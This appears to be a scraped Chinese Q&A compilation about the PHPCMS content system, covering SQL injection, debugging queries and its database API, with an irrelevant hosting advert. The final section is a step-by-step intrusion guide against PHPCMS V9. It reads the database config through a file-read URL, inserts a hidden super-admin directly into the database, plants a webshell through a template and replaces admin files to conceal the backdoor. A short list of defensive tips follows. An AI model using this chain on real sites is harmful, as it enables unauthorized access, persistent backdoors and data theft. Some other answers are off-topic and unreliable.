‘壹’ 以下哪个选项是phpcms中存在sql注入漏洞的字段
SQL注入漏洞有哪些 SQL注入攻击是当今最危险、最普遍的基于Web的攻击之一。所谓注入攻击,是攻击者把SQL命令插入到Web表单的输入域页面请求的查询字符串中,如果要对一个网站进行SQL注入攻击
‘贰’ PHPCMS,怎么$this->db->insert($info);打印这个完整sql语句求指点
如果是调试程序的话,在phpcms/libs/classes/mysql.class.php 这个文件里的
private function execute($sql) {
这行下面加上
echo $sql;
exit();
‘叁’ 阿里云又提示网站被注入了,phpcms真有问题吗
是的 PHPCMS V9版本带有很多注入漏洞以及本地包含文件漏洞 以及上传漏洞等等。
‘肆’ 求phpcms 通过执行sql语句添加管理员
INSERT INTO `phpcmsv9`.`v9_admin`(`userid`,`username`,`password`,`roleid`,`encrypt`,`lastloginip`,`lastlogintime`,`email`,`realname`,`card`,`lang`) VALUES ( NULL,'admin','','1','TPTUni',NULL,'0',NULL,'','','');
帐号:admin
密码:phpcms
‘伍’ phpcms他妈的怎么直接使用 sql
在前端模板里面,直接使用get万能标签来执行sql命令。
例如:
{pc:get sql="select * from phpcms_table" num="5"}
在后台php程序里面,采用mvc模式,主要流程是,对于你的数据表在phpcms/model/目录下简历模型文件,然后在控制器类里通过$db = pc_base::load_model("tablename_model")方法来引入此模型来创建对象,那么就可以使用使用model.class.php里面的数据库操作方法了。
例如:
$data=$db->select("catid=3","title,inputtime");这样来执行查询。可以使用query方法直接执行sql命令,例如:
$db->query("select*fromphpcms_newswherecatid=3andstatus=99");。
PS:model.class.php目录是phpcms/libs/class/model.class.php
‘陆’ phpcms v9 如何避免sql注入
校验特殊字符
‘柒’ 求phpcms v9的数据库增删改查 是怎么实现的
表明默认当前load_model('xxxx')模块所在表名xxxx
若要指定表名 则:操作在mysql.class.php中$this->db->select(...)
1、查询
$this->select($where = '', $data = '*', $limit = '', $order = '', $group = '', $key='') 返回结果集数组
条件 ,字段(id,name,email....),范围 排序方式,分组方式,按建名排序
2、查询多条数据并分页
listinfo($where = '', $order = '', $page = 1, $pagesize = 20, $key='', $setpages = 10,$urlrule = '',$array = array())
3、获取单条记录查询
get_one($where = '', $data = '*', $order = '', $group = '')
4、直接执行sql查询
query($sql);
5、获取最后一次添加记录的主键号 insert_id()
6、执行更新记录操作 update($data, $where = '') $data 建议为数组,$where 可为数组可为字符串
7、执行删除记录操作 delete($where)
8、计算记录数 count($where = '')
9、获取最后数据库操作影响到的条数 affected_rows()
10、获取数据表主键 get_primary()
11、获取表字段 get_fields($table_name = '')
12、检查表是否存在 table_exists($table)
13、 检查字段是否存在 field_exists($field)
更多问题可以去php中文网问答社区提问,大神在线帮你解决,希望对你有帮助
‘捌’ 如何修复 phpcms9.60 sql注入漏洞
如何修复 phpcms9.60 sql注入漏洞
漏洞是指应用软件或操作系统软件在逻辑设计上的缺陷或在编写时产生的错误,
这个缺陷或错误可以被不法者或者电脑黑客利用。修补漏洞,可以用腾讯电脑管家,
修复漏洞,强大智能的漏洞修复工具,全面修复微软系统漏洞和第三方软件漏洞。
‘玖’ phpcms 怎么往数据库添加数据
推荐你用:万网M3型空间:可免费试用,独立IP,多线机房,300M空间,50M的MSSQL或MYSQL,WIN2003支持ASP/NET/ MSSQL2000,UNIX支持PHP4/5/MYSQL5,免费提供备案平台服务。
国际顶级英文域名:60元(续费65元)
可咨询我们在线客服,享受优惠。我们已为25000多家用户提供了6年多优秀服务,更专业,更稳定。联系方式请点击我的用户名——用户资料。
‘拾’ 服务器装什么软件 phpcms注入漏洞
本文利用了PHPCMS V9的两个漏洞,一个是读取任意文件漏洞,另一个是模版运行php脚本漏洞。使用到的工具:Navicat for Mysql/IE浏览器(建议使用代理)/湛蓝v9代码包(包含文中使用到的所有文件、代码和木马)
1、放置data.txt以备在目标站点读取并在目标站点生成PHP木马脚本使用。
例如将data.txt放置在yun..com/j0192/data.txt
2、通过v9漏洞获取配置信息(请参阅:phpcms V9最新读取站点任意文件漏洞http://skyhome.cn/phpcms/176.html)。
/index.php?m=search&c=index&a=public_get_suggest_keyword&url=asdf&q=../../phpsso_server/caches/configs/database.php
3、通过v9系统漏洞获取到的数据库信息远程登陆目标站点数据库,在v9_admin和v9_sso_admin表中添加账号
username字段:admn
password字段:
encrypt 字段:bGV22e
issuper 字段: 1
4、通过数据库添加管理员账号后使用以下用户名密码在后台登陆,然后修改当前用户密码。
用户名:admn
密码:123456
5、ctrl+a复制write.php全部内容粘贴进v9默认模版下的footer.html保存,然后点击footer.html的可视化运行该模版中的脚本,到此时就完成在目标站点生成木马脚本。
6、打开ifeng.com/caches/caches_template/default/wap/data.class.php
用户名:admin
密码:admin
7、隐藏新增加的管理员。
通过木马脚本上传替换/phpcms/moles/admin/admin_manage.php(默认匹配%admn%),然后登陆目标站点后台查看管理员列表是否还有用户名为admn的超级管理员,如果没有则表明我们完成了新加管理员的隐藏。
8、隐藏新增加的关联链接
通过木马脚本上传替换/phpcms/moles/admin/keylink.php((默认匹配%skyhome%))
9、将目标网站的漏洞修复,以防其他黑客入侵。
通过木马脚本上传替换/phpcms/moles/search/index.php
防黑参考:
1、关闭数据库远程访问。
2、静态文件及附件等文件目录禁止执行权限。
3、脚本文件目录禁止写权限。
4、系统后台等重要目录限制IP访问。
5、及时关注开源系统官方补丁升级和乌云、sebug等漏洞发布平台,修复系统漏洞。